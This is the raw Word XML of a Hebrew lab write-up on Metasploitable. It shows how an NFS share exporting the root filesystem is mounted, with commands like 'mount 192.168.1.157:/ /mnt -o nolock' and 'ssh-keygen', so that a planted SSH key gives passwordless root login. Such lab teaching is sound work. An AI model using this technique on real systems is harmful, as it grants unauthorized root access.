            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="92" name="תמונה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92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33D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:r w:rsidR="00C7533D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- export list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AB96E" w14:textId="47C8E767" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01623A41" w14:textId="30618F4E" w:rsidR="00C7533D" w:rsidRPr="007D51BF" w:rsidRDefault="00C7533D" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C365F3" w14:textId="482AEC9D" w:rsidR="00C7533D" w:rsidRPr="007D51BF" w:rsidRDefault="00C7533D" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C41040" w14:textId="49B034E0" w:rsidR="00C7533D" w:rsidRPr="007D51BF" w:rsidRDefault="00C7533D" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E9561C" w14:textId="5A80B7AF" w:rsidR="00C7533D" w:rsidRPr="007D51BF" w:rsidRDefault="00C7533D" w:rsidP="00352C58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ונוכל לראות שמערכת הקבצים</w:t>
      </w:r>
      <w:r w:rsidR="00524609" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המשותפת היא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</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171398FB" w14:textId="77B404BD" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00FB6AB9" w:rsidP="00352C58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אם ננסה להתחבר נוכל לגשת לכל קובץ במערכת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5026AC7D" w14:textId="76B40B8D" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00FB6AB9" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742C1FBF" w14:textId="59D4D83E" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00FB6AB9" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5578A4C1" w14:textId="77777777" w:rsidR="00467196" w:rsidRPr="007D51BF" w:rsidRDefault="00467196" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435C29AC" w14:textId="32F056DB" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00FB6AB9" w:rsidP="00FB6AB9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lastRenderedPageBreak/>
        <w:t>כדי להתחבר למערכת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nfs 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נצטרך לייצר מפתח </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh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ולהעביר אותו למיקום הנכון במכונה המנוצלת וכך נוכל להתחבר למכונה ללא צורך שימוש בסיסמת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9B98D" w14:textId="73DF9D30" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00AA5BFD" w:rsidP="00352C58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התחילה נבדוק אם</w:t>
      </w:r>
      <w:r w:rsidR="00790451" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> איפה ממוקמת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תקיית </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shh</w:t>
      </w:r>
      <w:r w:rsidR="00790451" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00367A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שבה </w:t>
      </w:r>
      <w:r w:rsidR="00790451" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נייצר את המפתחות</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF21CB" w14:textId="5B59020C" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00790451" w:rsidP="00352C58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5A719DB9" wp14:editId="78C4DBE1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2095500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4533900" cy="217170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874D5" w14:textId="6F26FFFE" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00FB6AB9" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4637B3C7" w14:textId="61F8A08C" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00FB6AB9" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5C1C3A" w14:textId="77777777" w:rsidR="00790451" w:rsidRPr="007D51BF" w:rsidRDefault="00790451" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268E198B" w14:textId="77777777" w:rsidR="00790451" w:rsidRPr="007D51BF" w:rsidRDefault="00790451" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476AB75E" w14:textId="352E8004" w:rsidR="00790451" w:rsidRPr="007D51BF" w:rsidRDefault="00790451" w:rsidP="00352C58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58604D" wp14:editId="1A361CF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5013960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>207010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="358140" cy="228600"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="80" name="מלבן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A2CCB" id="מלבן 80" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:394.8pt;margin-top:16.3pt;width:28.2pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2F826" w14:textId="1623476A" w:rsidR="00790451" w:rsidRPr="007D51BF" w:rsidRDefault="00790451" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFE230F" w14:textId="3CD32E69" w:rsidR="00790451" w:rsidRPr="007D51BF" w:rsidRDefault="00790451" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACC65EE" w14:textId="03EBBC1C" w:rsidR="00790451" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00352C58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כעת נכנס לתקיה ונבדוק את התוכן </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9ACFE" w14:textId="059C3BFE" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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t>cd .ssh/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B62D21" w14:textId="48C7C1C6" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00352C58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ונשמתמש בכלי </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh-keygen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כדי לייצר את המפתחות</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A341119" w14:textId="604BFCE1" w:rsidR="00FB6AB9" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B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הפקודה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ssh-keygen -t rsa -b 4096</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D6F76" w14:textId="08310220" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:jc w:val="right"/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סוג המפתח -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-t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EF84E" w14:textId="7187F4A6" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:jc w:val="right"/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t>-b</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75258F54" w14:textId="7271E316" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B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45547BE7" wp14:editId="78E4BD5E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1943100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>180975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4800600" cy="3302668"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="84" name="תמונה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D02BF" w14:textId="799120F4" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4429D1" w14:textId="352BC5CE" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3ED973" w14:textId="11939985" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC5F09" w:rsidP="00367A6B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F6C12C" wp14:editId="3AEECDF8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4739640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>222885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="518160" cy="137160"/>
                <wp:effectExtent l="0" t="0" r="15240" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="131" name="מלבן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B8DCA" id="מלבן 131" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:373.2pt;margin-top:17.55pt;width:40.8pt;height:10.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" filled="f" strokecolor="yellow" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="534828E7" w14:textId="1621BA5B" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC5F09" w:rsidP="00367A6B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CB4A339" wp14:editId="33770609">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4419600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>77470</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="861060" cy="137160"/>
                <wp:effectExtent l="0" t="0" r="15240" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="132" name="מלבן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35B21" id="מלבן 132" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:348pt;margin-top:6.1pt;width:67.8pt;height:10.8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" filled="f" strokecolor="yellow" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AEC23D" w14:textId="7D91817A" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E4B218" w14:textId="3791221A" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D6220D" w14:textId="12E52810" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3EB165" w14:textId="0C2869C1" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056DC08C" w14:textId="5E806D82" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF60C55" w14:textId="1D441F9A" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597D2133" w14:textId="306F7B98" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE5366F" w14:textId="57660D59" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011B050C" w14:textId="2B134681" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B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עכשיו נוצר לנו 2 מפתחות </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D847DAF" w14:textId="32AD7299" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B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1 ציבורי </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43121C38" w14:textId="193CD573" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B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1 פרטי</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD54FF4" w14:textId="0B692B4F" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CAF2175" w14:textId="53F24CC0" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">כעת נתחבר עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">monut 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למערכת הקבצים </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nfs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ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploitable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11775238" w14:textId="3F28CBFB" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>mount -t 192.168.1.157:/ /mnt -o nolock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26405E" w14:textId="25800402" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00CC6D21">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B267A7F" w14:textId="29B3D3A5" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00CC6D21">
      <w:pPr>
        <w:jc w:val="right"/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t>-t- target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB3934" w14:textId="78599229" w:rsidR="00CC6D21" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00CC6D21">
      <w:pPr>
        <w:jc w:val="right"/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t xml:space="preserve">-o- options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DBBC72" w14:textId="355D26BE" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00CC6D21" w:rsidP="00367A6B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649EC15A" wp14:editId="747EF2CE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>883920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="810554"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapNone/>
            <wp:docPr id="91" name="תמונה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01F54" w14:textId="076E9324" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380F7357" w14:textId="43C8B157" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05481D31" w14:textId="3A949853" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A4727A" w14:textId="36760AEC" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00D11A12" w:rsidP="00367A6B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עכשיו נכנס לתקיה ונוודא שאנחנו בתקיה המשותפת</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B898403" w14:textId="1516D451" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00D11A12" w:rsidP="00367A6B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3F7F2225" wp14:editId="3BFE9856">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>11431</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3300095" cy="893776"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapNone/>
            <wp:docPr id="94" name="תמונה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89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7E593" w14:textId="5F058A13" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60547151" w14:textId="7023B7E5" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C0155F" w14:textId="698DDF31" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00D11A12" w:rsidP="00367A6B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18A99D0F" wp14:editId="76C4D71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299460" cy="838175"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="95" name="תמונה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8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EE687" w14:textId="30E57075" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
